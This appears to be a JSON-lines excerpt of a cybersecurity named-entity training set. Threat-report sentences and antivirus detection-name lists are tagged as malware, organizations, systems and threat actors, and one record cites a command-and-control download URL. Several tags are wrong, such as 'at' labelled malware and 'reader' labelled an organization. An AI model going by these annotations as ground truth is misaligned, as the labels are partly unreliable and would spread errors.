{"text": "Marcher inspects its infected devices carefully by using a dedicated, hard-coded configuration in each Android Package Kit APK, Google's file format for distributing and installing application software like mobile banking apps on the Android OS.", "spans": {"MALWARE: Marcher": [[0, 7]], "SYSTEM: Android Package Kit APK, Google's file format": [[103, 148]], "SYSTEM: application software": [[181, 201]], "SYSTEM: mobile banking apps": [[207, 226]], "SYSTEM: the Android OS.": [[230, 245]]}, "info": {"id": "cyner2_train_005658", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Downldr2.IYLF Trojan.Starter.1949 Riskware/Win32.Krap.ii Win32.Hack.Undef.kcloud TrojanDropper:Win32/Kidtok.A W32/Downloader.LQFG-1421 Virus.Win32.Heur.g BScope.Trojan-Spy.Zbot PE:Malware.FakeDOC@CV!1.9C3B Trojan-Dropper.Win32.Kidtok", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005659", "source": "cyner2_train"}}
{"text": "Therefore we instead discuss a number of ways to detect and analyse these documents using freely available tools.", "spans": {}, "info": {"id": "cyner2_train_005660", "source": "cyner2_train"}}
{"text": "PDFs with download links", "spans": {}, "info": {"id": "cyner2_train_005661", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PSWTool.Win32.NetPass!O HackTool.Dialupas Tool.NetPass.Win32.1002 Win32.Trojan.WisdomEyes.16070401.9500.9825 W32/Risk.DWIG-1726 Trojan-Spy.IEPV not-a-virus:PSWTool.Win32.NetPass.atx Trojan.Win32.Ool.cjzhzi Tool.PassView.277 BehavesLike.Win32.Downloader.gc W32/MalwareS.AKEN APPL/PSWTool.Pass.A Application.Heur.BmNfbCuqfGoO not-a-virus:PSWTool.Win32.NetPass.atx Trojan/Win32.Klone.C127582 PUP.Optional.Dialupass Trojan.PSWTool!vbtNAUr+Slw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005662", "source": "cyner2_train"}}
{"text": "The email, first of them submitted from Middle East, purports to be coming from a Turkish trading company, which might further indicate the geographic area where the attacks were active.", "spans": {"ORGANIZATION: a Turkish trading company,": [[80, 106]]}, "info": {"id": "cyner2_train_005663", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Cleanmg.Trojan Trojan-Spy.Win32.TianYan!O BackDoor-YA.dr Trojan/Spy.TianYan.b TSPY_TIANYAN.SMD Win32.Backdoor.Prisos.b W32.Killaut.A Win32/TianYan.A TSPY_TIANYAN.SMD Win.Spyware.35814-2 Trojan.Win32.TianYan.xbqa Trojan.Win32.TianYan.40960 Troj.Spy.W32.TianYan.m9ks TrojWare.Win32.TrojanSpy.TianYan.~A Win32.HLLP.Nemesis.28687 BackDoor-YA.dr TrojanSpy.TianYan.a Trojan[Spy]/Win32.TianYan Win32.Troj.TianYan.b.kcloud Trojan.Symmi.D7121 Backdoor:Win32/Prisos.A Worm/Win32.Mabezat.R26794 TrojanSpy.TianYan Win32/Prisos.A Trojan-Spy.Win32.TianYan.b Win32/Trojan.Dropper.e23", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005664", "source": "cyner2_train"}}
{"text": "Our documentation points to a campaign that started somewhere in late February 2015 and ended in mid-March.", "spans": {"THREAT_ACTOR: campaign": [[30, 38]]}, "info": {"id": "cyner2_train_005665", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.LRQwegierExe.Trojan Trojan/W32.Small.14848.CH Trojan.Daws.17020 Trojan.Kazy.D192B Win32.Trojan.Dalixi.f Trojan-Dropper.Win32.Daws.dyru Troj.W32.KillAV.lCzy BehavesLike.Win32.VTFlooder.lh Trojan:Win32/Ghodow.A Trojan-Dropper.Win32.Daws.dyru Win32/Dalixi.A Trojan.Dalixi!sYT5S6B5t8c W32/Dloader.IQS!tr.dldr Win32/Trojan.b7f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005667", "source": "cyner2_train"}}
{"text": "A new ransomware called CryptoLuck has been discovered by Proofpoint security researcher and exploit kit expert Kafeine that is being distributed via the RIG-E exploit kit.", "spans": {"MALWARE: ransomware": [[6, 16]], "MALWARE: CryptoLuck": [[24, 34]], "ORGANIZATION: Proofpoint security researcher": [[58, 88]], "MALWARE: exploit kit": [[93, 104]], "MALWARE: expert Kafeine": [[105, 119]], "MALWARE: RIG-E exploit kit.": [[154, 172]]}, "info": {"id": "cyner2_train_005669", "source": "cyner2_train"}}
{"text": "Ransomware in its various forms continues to make headlines as much for high-profile network disruptions as for the ubiquity of attacks among consumers.", "spans": {"MALWARE: Ransomware": [[0, 10]], "ORGANIZATION: high-profile network": [[72, 92]], "ORGANIZATION: consumers.": [[142, 152]]}, "info": {"id": "cyner2_train_005671", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Staget!O Trojan.Vb.AB2 Trojan.Injector Trojan/Staget.fk Trojan.Zusy.D381B TROJ_CHEKAF.SMIA Win32.Trojan.U-Staget.a TROJ_CHEKAF.SMIA Win.Trojan.Staget-28 Trojan.Win32.SelfDel.cdyc Trojan.Win32.Staget.btpvn Trojan.Win32.A.Staget.98334 Troj.W32.SelfDel.tnPD Trojan.MulDrop1.56405 Trojan.Staget.Win32.367 BehavesLike.Win32.Swisyn.nm Trojan/Staget.hg Trojan/Win32.Staget Win32.Troj.Staget.fk.kcloud Trojan.Win32.SelfDel.cdyc Trojan/Win32.Staget.R21060 Trojan.VBRA.09701 Trojan.Staget!A6l5b/HpLEg Trojan.Win32.Staget W32/Staget.EG!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005673", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/CoinMiner.td not-a-virus:RiskTool.Win32.BitCoinMiner.wzo Riskware.Win32.BitCoinMiner.dktqwy Tool.BtcMine.479 Trojan.CoinMiner.Win32.1509 Trojan.Win32.CoinMiner RiskWare[RiskTool]/Win32.BitCoinMiner Trojan:Win32/Dimnir.A Application.Heur2.EE0329 not-a-virus:RiskTool.Win32.BitCoinMiner.wzo W32/CoinMiner.TD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005674", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Hotdog.A Backdoor.Hotdog.A Trojan.Win32.Hotdog.chmwe W32/Hotdog.B Spyware.Hotra TROJ_HOTDOG.A Backdoor.Win32.Hotdog Backdoor.Hotdog.A Backdoor.Hotdog!YGk3IGmjo+U Backdoor.Win32.Hotdog.B Backdoor.Hotdog.A Trojan.Hotdog.49152 TROJ_HOTDOG.A Win32.Hack.Hotdog.8F.kcloud Backdoor:Win32/Hotdog.A Trojan.Win32.Hotra.49152 Backdoor.Hotdog.A W32/Hotdog.OZIJ-0895 Win-Trojan/Hotra.57344 Spyware.Hotra Win32/Hotdog.B Backdoor.Win32.Hotdog W32/Hotdog.A!tr.bdr BackDoor.Hotdog.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005675", "source": "cyner2_train"}}
{"text": "malware used by the HiddenCobra threat group", "spans": {"MALWARE: malware": [[0, 7]], "THREAT_ACTOR: the HiddenCobra threat group": [[16, 44]]}, "info": {"id": "cyner2_train_005676", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPWS.Dexter.A4 Trojan.Poxters.Win32.176 Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_DEXTR.SMM HEUR:Trojan.Win32.Invader Trojan.Win32.Invader.elqaga Trojan.FakeAV.19781 BKDR_DEXTR.SMM BehavesLike.Win32.VTFlooder.nh Trojan.Invader.aqk Trojan/Win32.Invader HEUR:Trojan.Win32.Invader Trojan.Invader! Trojan.Win32.Poxters W32/Poxters.E!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005677", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer.FC.316 Win32.Trojan.WisdomEyes.16070401.9500.9957 MSIL.Backdoor.Orcus.A Troj.Spy.Msil!c Trojan.DownLoader25.14345 BehavesLike.Win32.Backdoor.dc TrojanSpy.MSIL.sam TR/Dropper.MSIL.yknpx PWS:MSIL/Orcus.A!bit Win-Trojan/OrcusRAT.Exp Trj/CI.A Win32/Trojan.Spy.c29", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005678", "source": "cyner2_train"}}
{"text": "A year later, a more dangerous version was released.", "spans": {}, "info": {"id": "cyner2_train_005679", "source": "cyner2_train"}}
{"text": "The malware spreads very fast using Telegram messenger application in smartphones, targeting high-profile Libyan influential and political figures.", "spans": {"MALWARE: malware": [[4, 11]], "SYSTEM: Telegram messenger application": [[36, 66]], "SYSTEM: smartphones,": [[70, 82]], "ORGANIZATION: high-profile Libyan influential": [[93, 124]], "ORGANIZATION: political figures.": [[129, 147]]}, "info": {"id": "cyner2_train_005682", "source": "cyner2_train"}}
{"text": "Much of the contents of that report are reproduced here.", "spans": {}, "info": {"id": "cyner2_train_005684", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Stration PUA.Packed.MEW-1 IM-Worm.Win32.Sumom.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005687", "source": "cyner2_train"}}
{"text": "In a seven-hour window, Raytheon | Websense stopped over 16,000 malicious email messages from being delivered to customers, all of which appear to have been Japanese targets.", "spans": {"ORGANIZATION: Raytheon": [[24, 32]]}, "info": {"id": "cyner2_train_005688", "source": "cyner2_train"}}
{"text": "The exploit code attached used for dropping the malware is older – CVE-2012-0158 – and from our vantage point, we have no indication of successful or failed exploitation.", "spans": {"MALWARE: The exploit code": [[0, 16]], "MALWARE: malware": [[48, 55]], "VULNERABILITY: exploitation.": [[157, 170]]}, "info": {"id": "cyner2_train_005689", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.OptixKill.31744 Trojan/OptixKill.10 TROJ_OPTIXKILL.F Win32.Trojan.WisdomEyes.16070401.9500.9985 W32/Trojan.HEHF-6024 TROJ_OPTIXKILL.F Win.Trojan.Killer-4 Trojan.Win32.OptixKill.10 Trojan.Win32.OptixKill.dkur Trojan.Win32.A.OptixKill.31744 TrojWare.Win32.OptixKill.10 Trojan.OptixKiller Trojan.OptixKill.Win32.20 Trojan/Win32.OptixKill.10 W32.Trojan.Backdoor-Ealim TR/OptixKill.10 Trojan/Win32.OptixKill Trojan:Win32/Optixkiller.A Troj.W32.OptixKill.10!c Trojan.Win32.OptixKill.10 Trojan/Win32.HDC.C1938 Trojan.OptixKill Trj/OptixKill.10 Win32/OptixKill.10 Win32.Trojan.Optixkill.Wsat Trojan.OptixKill!RjZYoc6lQeg Trojan-PWS.Win32.Lmir.wj W32/OptixKill.10!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005690", "source": "cyner2_train"}}
{"text": "While threat actors using the PlugX Trojan typically leverage legitimate executables to load their malicious DLLs through a technique called DLL side-loading, Unit 42 has observed a new executable in use for this purpose.", "spans": {"THREAT_ACTOR: threat actors": [[6, 19]], "MALWARE: PlugX Trojan": [[30, 42]], "ORGANIZATION: Unit 42": [[159, 166]]}, "info": {"id": "cyner2_train_005691", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Conficker.lh Trojan.Win32.Spy Win32.Troj.Undef.kcloud Trojan.Kazy.D2002F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005692", "source": "cyner2_train"}}
{"text": "Although Banker has been in the wild for years, this time we see it using a Dynamic Loading Library DLL with malicious exported functions.", "spans": {"THREAT_ACTOR: Banker": [[9, 15]], "MALWARE: malicious exported functions.": [[109, 138]]}, "info": {"id": "cyner2_train_005693", "source": "cyner2_train"}}
{"text": "It was first reported in 2013 under the version number 2.0-LNK where it used the tag BaneChant in its command-and-control C2 network request.", "spans": {"MALWARE: 2.0-LNK": [[55, 62]], "MALWARE: BaneChant": [[85, 94]]}, "info": {"id": "cyner2_train_005694", "source": "cyner2_train"}}
{"text": "Due to its ability to intercept SMS communications, the malware is also able to bypass SMS-based two-factor authentication.", "spans": {"MALWARE: malware": [[56, 63]]}, "info": {"id": "cyner2_train_005695", "source": "cyner2_train"}}
{"text": "In 2019, X-Force IRIS incident responders observed ITG03 conducting a campaign against a financial institution in Southeast Asia targeting the institution's SWIFT environment.", "spans": {"ORGANIZATION: X-Force IRIS": [[9, 21]], "THREAT_ACTOR: ITG03": [[51, 56]], "THREAT_ACTOR: campaign": [[70, 78]], "ORGANIZATION: a financial institution": [[87, 110]], "ORGANIZATION: the institution's SWIFT environment.": [[139, 175]]}, "info": {"id": "cyner2_train_005696", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 W32/Small.WMNN-1529 TSPY_ONLING.SMIF Trojan.Win32.OnLineGames.vmk Trojan.DownLoader4.46724 TSPY_ONLING.SMIF W32/Small.IH TR/Fakealert.39719 TrojanDownloader:Win32/Rarcon.B Trojan.Graftor.D46F5 Trojan-Downloader.Win32.Small Win32/Trojan.add", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005698", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Android.SmForw.AE Android.Trojan.SMSSend.IA AndroidOS/Trojan.DPEF-9 Android.Trojan.SMSSend.IA A.H.Int.SmsThief.DBA Trojan.Android.SmsForward.duiqpk Android.SmsSpy.672.origin Trojan[SMS]/Android.SmForw.aa Android.Trojan.SMSSend.IA Android-Trojan/SmsSend.915f Trojan.AndroidOS.Lockerpin", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005699", "source": "cyner2_train"}}
{"text": "SageCrypt downloaders, often poorly detected at the network level due to the usage of LetsEncrypt certificates.", "spans": {"MALWARE: SageCrypt downloaders,": [[0, 22]]}, "info": {"id": "cyner2_train_005700", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Packer.Morphine.B Packer.Morphine.B Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Conhook-11 Packer.Morphine.B Packer.Morphine.B Packer.Morphine.B TrojWare.Win32.PkdMorphine.~AN Packer.Morphine.B Trojan.Click.3614 BehavesLike.Win32.Pykse.gc Trojan.Win32.BHO Packed.Morphine.a Trojan:Win32/Bohojan.A Packer.Morphine.B W32/BHO.BO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005701", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Newspy W32/NionSpy.e!dr TROJ_MEWSPY.CE Trojan.Win32.MewsSpy.drsazo TrojWare.Win32.TrojanDownloader.Geral.A Win32.MewsSpy.47 TROJ_MEWSPY.CE BehavesLike.Win32.DocumentCrypt.cc Virus.Win32.MewsSpy W32/Trojan.OBEZ-9322 Trojan.Kazy.D2524 Trojan:Win32/Newspy.A Trj/CI.A Win32.Virus.Mewsspy.Hroy W32/MewsSpy.AE Win32/Trojan.22f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005702", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exp.SWF.CVE-2014-8439.A Trojan.Swifi TROJ_FRS.PMA000B515 Swf.Exploit.Angler-4 Trojan.Swf.CVE20140515.dsfxmi SWF.Z.CVE-2014-0515.87352 Exploit.SWF.376 TROJ_FRS.PMA000B515 BehavesLike.Flash.Exploit.cb Exploit:SWF/Axpergle.B SWF/Exploit.ExKit.H Exploit.SWF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005703", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan:Win32/Plugx.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005705", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Downloader.Zlob.Win32.16141 Trojan.Kazy.D15115 Win32.Trojan.WisdomEyes.16070401.9500.9987 TROJ_ZLOB.HRX Win.Trojan.Zlob-2206 Trojan-Downloader.Win32.Zlob.vjl Trojan.Win32.Zlob.cvogpg TrojWare.Win32.TrojanDownloader.Zlob.~YG Trojan.Popuper.7315 TROJ_ZLOB.HRX Trojan.Zlob TrojanDownloader.Zlob.lui TR/Dldr.Zlob.pea.1 Trojan[Downloader]/Win32.Zlob Trojan-Downloader.Win32.Zlob.vjl Trojan/Win32.Zlob.R23708 Trojan.Zlob.23616 Win32/TrojanDownloader.Zlob.CHF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005706", "source": "cyner2_train"}}
{"text": "For five months, Check Point mobile threat researchers had unprecedented, behind the scenes access to a group of cybercriminals in China.", "spans": {"ORGANIZATION: Check Point mobile threat researchers": [[17, 54]], "THREAT_ACTOR: group": [[104, 109]], "THREAT_ACTOR: cybercriminals": [[113, 127]]}, "info": {"id": "cyner2_train_005708", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Zusy.D3C813 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005709", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.KolabcK.PE Net-Worm.Win32.Kolabc!O W32.Futu.A2 Win32.Virus.Probably.c W32.Blaster.Worm PE_FUTU.A Win.Exploit.DCOM-5 Win32.Trojan-Dropper.Rbot.A Virus.Win32.Kolabc.brlvjf W32.W.Kolabc.m0xC Virus.Win32.Kolabc.aab BackDoor.Swz.125 Worm.Kolabc.Win32.2973 PE_FUTU.A BehavesLike.Win32.Backdoor.wz Worm[Net]/Win32.Kolabc Worm.Kolabc.gu.kcloud Worm/Win32.Kolabc.R68544 BackDoor.Swz! Trojan-Proxy.Win32.Ranky W32/Kolabc.GU!worm.im Worm.Kolabc W32/BadFuture.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005711", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAdware.4A43 Trojan.Application.LoadMoney.Razy.8 Win32.Adware.Kryptik.c Infostealer.Limitail Win.Trojan.Loadmoney-12443 not-a-virus:Downloader.Win32.Plocust.dwa Trojan.Win32.LoadMoney.cspznv TrojWare.Win32.Kryptik.BAJ Trojan.LoadMoney.15 Trojan/StartPage.pch RiskWare[Downloader]/Win32.Plocust.dwa not-a-virus:Downloader.Win32.Plocust.dwa PUP/Win32.LoadMoney.R99289 TScope.Malware-Cryptor.SB Trojan.Win32.Spy Win32/Application.a8e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005712", "source": "cyner2_train"}}
{"text": "An unknown attacker gained access to the Bangladesh Bank's BB SWIFT payment system and reportedly instructed an American bank to transfer money from BB's account to accounts in The Philippines.", "spans": {"THREAT_ACTOR: unknown attacker": [[3, 19]], "ORGANIZATION: Bangladesh Bank's BB": [[41, 61]], "SYSTEM: SWIFT payment system": [[62, 82]], "ORGANIZATION: American bank": [[112, 125]]}, "info": {"id": "cyner2_train_005713", "source": "cyner2_train"}}
{"text": "The Stegoloader malware family also known as Win32/Gatak.DR and TSPY_GATAK.GTK despite not sharing any similarities with the Gataka banking trojan was first identified at the end of 2013 and has attracted little public attention.", "spans": {"MALWARE: Stegoloader malware": [[4, 23]], "MALWARE: Gataka banking trojan": [[125, 146]]}, "info": {"id": "cyner2_train_005714", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.D2B9C9 Trojan.Delf.Win32.71682 BehavesLike.Win32.BadFile.hh PUA.Toolbar.TB Trojan:Win32/Waqlop.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005715", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Scar!O Trojan.Scar Win.Trojan.Scar-8271 Trojan.Win32.Scar.evwf Trojan.Win32.A.Scar.53248.I W32.W.WBNA.lJwt Trojan.Scar.Win32.68398 BehavesLike.Win32.VBObfus.lz Trojan.Win32.Scar Trojan/Scar.azur Trojan/Win32.Scar Trojan.Win32.Scar.evwf Trojan/Win32.Scar.R55318 Trojan.Scar Win32/VB.ROS Win32.Trojan.Scar.Pbfp Trojan.Scar!dNffxsGO4PU W32/Scar.EVWF!tr Win32/Trojan.b39", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005717", "source": "cyner2_train"}}
{"text": "Fidelis Cybersecurity analysis has identified unrelated cyber criminal activity leveraging the vulnerability cited in CVE-2014-4114, which was initially exploited by advanced persistent threat APT actors in October 2014.", "spans": {"ORGANIZATION: Fidelis Cybersecurity analysis": [[0, 30]], "THREAT_ACTOR: cyber criminal activity": [[56, 79]], "VULNERABILITY: vulnerability": [[95, 108]], "VULNERABILITY: exploited": [[153, 162]], "THREAT_ACTOR: advanced persistent threat APT actors": [[166, 203]]}, "info": {"id": "cyner2_train_005718", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.E1FFDC Trojan.Win32.Delf.cxivds BehavesLike.Win32.Trojan.gh TR/Dldr.Slarkic.H.4 Trojan[Downloader]/Win32.Unknown TrojanDownloader:Win32/Notorgatro.B Trojan/Win32.CSon.R2885 Downloader.Delphi Trj/CI.A Win32/Trojan.BO.0a3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005719", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Protux Backdoor/Protux.wz Trojan.Win32.Protux.pdpbh Backdoor.Trojan Protux.AO Backdoor.Win32.Protux.ws Backdoor.Protux!x0RB0sLZXQU Win32.HLLW.Autoruner1.4496 BDS/Protux.ws Heuristic.BehavesLike.Win32.Backdoor.H Backdoor/Protux.ht Win32.Troj.Undef.kcloud Backdoor.Win32.A.Protux.102400.A Backdoor/Win32.Trojan Backdoor.Protux Backdoor.Trojan Backdoor.Win32.Protux W32/Protux.WS!tr.bdr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005721", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Obfuscated.FA Trojan.Win32.Zapchast!IK Dropper.Win32.Mnless.fxg Trojan.Win32.Zapchast", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005722", "source": "cyner2_train"}}
{"text": "The reader looked at the config and realized that his router got a new, suspicious entry in the NTP server name field, namely", "spans": {"ORGANIZATION: reader": [[4, 10]], "SYSTEM: router": [[54, 60]]}, "info": {"id": "cyner2_train_005723", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Nimda.E Win32.Trojan.HotKeysHook.b W32/NetWorm.YYMQ-0484 Win32/Nimda.E Win.Worm.N-74 Win32.Trojan.HotKeysHook.A Net-Worm.Win32.Nimda.e Trojan.Win32.Nimda.glkx Win32.HLLW.Nimda.57344 Worm.Nimda.Win32.79 W32/NetWorm.BF W32/Nimda.3 Worm[Net]/Win32.Nimda.e Trojan.Strictor.D1109F Net-Worm.Win32.Nimda.e Trojan/Win32.HDC.C61626 Worm.Nimda Worm.Nimda!YOZDpQiibZo Trojan.I-Worm.Nimda Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005725", "source": "cyner2_train"}}
{"text": "Here is a list of broadcast actions : android.provider.Telephony.SMS_RECEIVED android.net.conn.CONNECTIVITY_CHANGE android.intent.action.BATTERY_CHANGED android.intent.action.USER_PRESENT android.intent.action.PHONE_STATE android.net.wifi.SCAN_RESULTS android.intent.action.PACKAGE_ADDED android.intent.action.PACKAGE_REMOVED android.intent.action.SCREEN_OFF android.intent.action.SCREEN_ON android.media.RINGER_MODE_CHANGED android.sms.msg.action.SMS_SEND android.sms.msg.action.SMS_DELIVERED Creating a Web Server to Phish XLoader creates a provisional web server to receive the broadcast events .", "spans": {"MALWARE: XLoader": [[525, 532]]}, "info": {"id": "cyner2_train_005727", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Java/Jacksbot.W Backdoor.Trojan Java.Jacksbot.136 BehavesLike.Win32.Trojan.wc Java/Jacksbot.W Trojan.Java.ce Trj/CI.A Win32/Trojan.407", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005728", "source": "cyner2_train"}}
{"text": "The targeting of state and local government agencies as well as the distribution methods are very similar to a CryptFile2 campaign we described in August.", "spans": {"ORGANIZATION: state": [[17, 22]], "ORGANIZATION: local government agencies": [[27, 52]], "MALWARE: CryptFile2": [[111, 121]], "THREAT_ACTOR: campaign": [[122, 130]]}, "info": {"id": "cyner2_train_005729", "source": "cyner2_train"}}
{"text": "We detected yet another 51 Trojan porn clickers accessible for the users to download.", "spans": {"MALWARE: 51 Trojan porn clickers": [[24, 47]]}, "info": {"id": "cyner2_train_005730", "source": "cyner2_train"}}
{"text": "After launch , it downloads a codec for MP3 encoding directly from the C & C server : http : //54.67.109.199/skype_resource/libmp3lame.dll The skype_sync2.exe module has a compilation timestamp – Feb 06 2017 and the following PDB string : \\\\vmware-host\\Shared Folders\\dati\\Backup\\Projects\\REcodin_2\\REcodin_2\\obj\\x86\\Release\\REcodin_2.pdb network.exe is a module for submitting all exfiltrated data to the server .", "spans": {}, "info": {"id": "cyner2_train_005732", "source": "cyner2_train"}}
{"text": "Dell SecureWorks Counter Threat Unit™ CTU researchers analyzed spam campaigns that distributed the AdWind remote access trojan RAT.", "spans": {"ORGANIZATION: Dell SecureWorks Counter Threat Unit™ CTU researchers": [[0, 53]], "THREAT_ACTOR: spam campaigns": [[63, 77]], "MALWARE: AdWind remote access trojan RAT.": [[99, 131]]}, "info": {"id": "cyner2_train_005734", "source": "cyner2_train"}}
{"text": "Following a previous discovery, FireEye Labs mobile researchers discovered another malicious adware family quickly spreading worldwide that allows for complete takeover of a user's Android device.", "spans": {"ORGANIZATION: FireEye Labs mobile researchers": [[32, 63]], "MALWARE: malicious adware family": [[83, 106]], "SYSTEM: Android device.": [[181, 196]]}, "info": {"id": "cyner2_train_005735", "source": "cyner2_train"}}
{"text": "This campaign was focused on various South American banks in an attempt to steal credentials from the user to allow for illicit financial gain for the malicious actors.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "ORGANIZATION: South American banks": [[37, 57]], "THREAT_ACTOR: malicious actors.": [[151, 168]]}, "info": {"id": "cyner2_train_005736", "source": "cyner2_train"}}
{"text": "Ironically, Ben-Gurion University is home to Israel's Cyber Security Research Center.", "spans": {"ORGANIZATION: Ben-Gurion University": [[12, 33]], "ORGANIZATION: Israel's Cyber Security Research Center.": [[45, 85]]}, "info": {"id": "cyner2_train_005737", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Typic!O Downldr.TonickCS.S543700 Dropper.Typic.Win32.736 Trojan/Dropper.Typic.arx Win32.Trojan-Downloader.VB.p Win32/Fruspam.GF Win.Trojan.Typic-1 Trojan-Downloader.Win32.Dapato.stb Trojan.Win32.Typic.dvexc TrojWare.Win32.TrojanDownloader.VB.OSNA TrojanDropper.Typic.me Trojan[Dropper]/Win32.Typic Dropper/Win32.Typic.R2031 TrojanDownloader.VB Trojan.Downloader.WCA Win32/TrojanDownloader.VB.OSN Trojan.DR.Typic!OCnhzJxHb3A Backdoor.Win32.Bifrose Trj/Downloader.XOR", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005741", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Shylock Trojan.Win32.Inject1.dkmayz Trojan.Win32.Z.Matrix.5088483 Trojan.Inject1.30662 Trojan.Blocker.Win32.12010 Trojan.Win32.Trxa W32/Trojan.SIWU-6483 Backdoor/Androm.ayy Trojan/Win32.Unknown Trojan.Matrix.1 Trojan:Win32/Trxa.A Backdoor.Androm Trj/CI.A Msil.Trojan.Kryptik.Lnej Trojan.Kryptik!0hVPn+vQuN8 MSIL/Kryptik.OR!tr Win32/Trojan.edc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005742", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9967 Trojan.VB.Win32.113731 Backdoor.Win32.Cinasquel Backdoor:Win32/Cinasquel.A Backdoor/Win32.RemoteAccess.R125850", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005743", "source": "cyner2_train"}}
{"text": "Comodo Threat Research Labs CTRL identified a new phishing email, that contains a malware file, and spread to email user with subject Dossier M978885982A -", "spans": {"ORGANIZATION: Comodo Threat Research Labs CTRL": [[0, 32]], "MALWARE: malware file,": [[82, 95]]}, "info": {"id": "cyner2_train_005744", "source": "cyner2_train"}}
{"text": "Adobe may have already patched a Flash Player vulnerability last week, but several users—especially those in the US, Canada, and the UK —are still currently exposed and are at risk of getting infected with CryptoWall 3.0. The Magnitude Exploit Kit included an exploit, detected as SWF_EXPLOIT.MJTE, for the said vulnerability, allowing attackers to spread crypto-ransomware into their target systems.", "spans": {"ORGANIZATION: Adobe": [[0, 5]], "SYSTEM: Flash Player": [[33, 45]], "MALWARE: at": [[173, 175]], "MALWARE: CryptoWall 3.0. The Magnitude Exploit Kit": [[206, 247]], "MALWARE: exploit,": [[260, 268]], "VULNERABILITY: vulnerability,": [[312, 326]], "MALWARE: crypto-ransomware": [[356, 373]], "SYSTEM: target systems.": [[385, 400]]}, "info": {"id": "cyner2_train_005745", "source": "cyner2_train"}}
